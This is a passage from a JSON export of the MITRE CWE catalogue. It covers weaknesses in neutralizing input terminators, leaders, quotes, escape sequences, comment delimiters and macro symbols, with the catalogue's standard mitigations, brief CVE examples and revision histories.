in conjunction with off-by-one error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0320"},{"Reference":"CVE-2001-0996","Description":"Mail server does not quote end-of-input terminator if it appears in the middle of a message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0996"},{"Reference":"CVE-2002-0001","Description":"Improperly terminated comment or phrase allows commands.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0001"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Input Terminator"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"460"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Input Terminator","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Input Terminator","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Input Terminators","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Input Terminators","attr":{"@_Date":"2010-04-05"}}]}},"148":{"attr":{"@_ID":"148","@_Name":"Improper Neutralization of Input Leaders","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application does not properly handle when a leading character or sequence (\\"leader\\") is missing or malformed, or if multiple leaders are used when only one should be allowed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that leading characters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Input Leader"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Input Leader","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Input Leader","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Input Leaders","attr":{"@_Date":"2010-06-21"}}]}},"149":{"attr":{"@_ID":"149","@_Name":"Improper Neutralization of Quoting Syntax","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Quotes injected into an application can be used to compromise a system. As data are parsed, an injected/absent/duplicate/malformed use of quotes may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that quotes will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0956","Description":"Database allows remote attackers to cause a denial of service (application crash) via a MATCH AGAINST query with an opening double quote but no closing double quote.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0956"},{"Reference":"CVE-2003-1016","Description":"MIE. MFV too? bypass AV/security with fields that should not be quoted, duplicate quotes, missing leading/trailing quotes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1016"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Quoting Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"468"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Quoting Element","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Quoting Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Quoting Syntax","attr":{"@_Date":"2010-06-21"}}]}},"150":{"attr":{"@_ID":"150","@_Name":"Improper Neutralization of Escape, Meta, or Control Sequences","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as escape, meta, or control character sequences when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that escape, meta and control characters/sequences will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0542","Description":"The mail program processes special \\"~\\" escape sequence even when not in interactive mode.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0542"},{"Reference":"CVE-2000-0703","Description":"Setuid program does not filter escape sequences before calling mail program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0703"},{"Reference":"CVE-2002-0986","Description":"Mail function does not filter control characters from arguments, allowing mail message content to be modified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0986"},{"Reference":"CVE-2003-0020","Description":"Multi-channel issue. Terminal escape sequences not filtered from log files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0020"},{"Reference":"CVE-2003-0083","Description":"Multi-channel issue. Terminal escape sequences not filtered from log files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0083"},{"Reference":"CVE-2003-0021","Description":"Terminal escape sequences not filtered by terminals when displaying files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0021"},{"Reference":"CVE-2003-0022","Description":"Terminal escape sequences not filtered by terminals when displaying files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0022"},{"Reference":"CVE-2003-0023","Description":"Terminal escape sequences not filtered by terminals when displaying files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0023"},{"Reference":"CVE-2003-0063","Description":"Terminal escape sequences not filtered by terminals when displaying files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0063"},{"Reference":"CVE-2000-0476","Description":"Terminal escape sequences not filtered by terminals when displaying files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0476"},{"Reference":"CVE-2001-1556","Description":"MFV. (multi-channel). Injection of control characters into log files that allow information hiding when using raw Unix programs to read the files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1556"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Escape, Meta, or Control Character / Sequence"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS03-J","Entry_Name":"Do not log unsanitized user input"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"134"}},{"attr":{"@_CAPEC_ID":"41"}},{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"93"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Escape, Meta, or Control Character / Sequence","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Escape, Meta, or Control Character / Sequence","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Escape, Meta, or Control Sequences","attr":{"@_Date":"2010-04-05"}}]}},"151":{"attr":{"@_ID":"151","@_Name":"Improper Neutralization of Comment Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as comment delimiters when they are sent to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that comments will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0001","Description":"Mail client command execution due to improperly terminated comment in address list.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0001"},{"Reference":"CVE-2004-0162","Description":"MIE. RFC822 comment fields may be processed as other fields by clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0162"},{"Reference":"CVE-2004-1686","Description":"Well-placed comment bypasses security warning.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1686"},{"Reference":"CVE-2005-1909","Description":"Information hiding using a manipulation involving injection of comment code into product. Note: these vulnerabilities are likely vulnerable to more general XSS problems, although a regexp might allow \\"&gt;!--\\" while denying most other tags.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1909"},{"Reference":"CVE-2005-1969","Description":"Information hiding using a manipulation involving injection of comment code into product. Note: these vulnerabilities are likely vulnerable to more general XSS problems, although a regexp might allow \\"&lt;!--\\" while denying most other tags.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1969"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Comment Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Comment Element","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Comment Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Comment Element","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Comment Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"152":{"attr":{"@_ID":"152","@_Name":"Improper Neutralization of Macro Symbols","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as macro symbols when they are sent to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Developers should anticipate that macro symbols will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, 